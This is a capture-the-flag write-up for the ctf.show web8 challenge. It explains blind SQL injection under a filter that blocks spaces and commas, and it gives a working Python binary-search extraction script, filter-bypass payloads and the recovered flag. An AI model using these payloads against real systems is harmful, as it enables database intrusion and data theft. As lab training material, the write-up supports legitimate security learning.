ctf.show_web8

Same as web7: still a blind injection solved with a script. The difference from web7 is that this time the comma has been added to the blacklist.

[Screenshot 1]

One look should tell you it is SQL injection. Usual routine: first test the quote closure with ' and 1=1#

The page responds with 有注入情节 ("injection detected").

Next, try -1 or true to check whether it is a numeric injection.

[Screenshot 2]

Still the same 有注入情节 response.

Time to fuzz.

[Screenshot 3]

The fuzz results show that both the comma and the space are blacklisted.

Spaces can be replaced with /**/ or avoided entirely by wrapping every term in parentheses.

[Screenshot 4]

It is a numeric injection.

Because spaces and commas are filtered and I do not know how to get sqlmap to run through that, I wrote a simple script (if anyone knowledgeable has pointers, please advise).

```python
import requests

flag = ''
url = 'http://5d5df583-bd9c-4868-92e7-0d46f3958e46.challenge.ctf.show/index.php?id='
head = {
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.31'
}

for i in range(1, 100):
    high = 128
    low = 30
    found = False
    print(f'{i}:')
    while high >= low:
        mid = (high + low) // 2

        # Dump table names. No commas: substr(... from ... for ...); no spaces: parentheses.
        # payload1 = f'1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))from({i})for(1)))>{mid})^1'
        # payload2 = f'1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))from({i})for(1)))<{mid})^1'
        # payload3 = f'1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))from({i})for(1)))={mid})^1'

        # Dump column names
        # payload1 = f'1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))from({i})for(1)))>{mid})^1'
        # payload2 = f'1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))from({i})for(1)))<{mid})^1'
        # payload3 = f'1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))from({i})for(1)))={mid})^1'

        # Dump the value. 1^(cond)^1 evaluates to cond, so the page behaves like id=1 only when cond is true.
        payload1 = f'1^(ascii(substr((select(group_concat(flag))from(flag))from({i})for(1)))>{mid})^1'
        payload2 = f'1^(ascii(substr((select(group_concat(flag))from(flag))from({i})for(1)))<{mid})^1'
        payload3 = f'1^(ascii(substr((select(group_concat(flag))from(flag))from({i})for(1)))={mid})^1'

        r1 = requests.get(url=url + payload1, headers=head)
        r2 = requests.get(url=url + payload2, headers=head)
        r3 = requests.get(url=url + payload3, headers=head)

        # 'my son!' is the id=1 page content: if it appears for r3, the character is mid; record it and move on
        if 'my son!' in r3.text:
            flag += chr(mid)
            found = True
            print(flag)
            break

        if 'my son!' in r1.text:
            low = mid + 1

        if 'my son!' in r2.text:
            high = mid - 1

    # Past the end of the string ascii(substr(...)) is 0, which never matches in [30, 128]: we are done
    if not found:
        break

print(flag)
```

Because the comma is blacklisted and substr(,,) separates its arguments with commas, the alternative syntax substr(... from ... for ...) is used instead.

[Screenshot 5]

The table name comes out as flag. Apart from the extra comma in the blacklist, everything looks identical to web7.

[Screenshot 6]

The column name is still flag.

ctfshow{f8ca61d2-ab6d-4653-9608-14dd652d8c18}

(One small issue I ran into: sometimes the script would get as far as ctfsh, just a few characters, then stall and throw an error. I assumed it was a code problem, but after switching networks it ran fine. Network speed can sometimes affect how the script runs.)
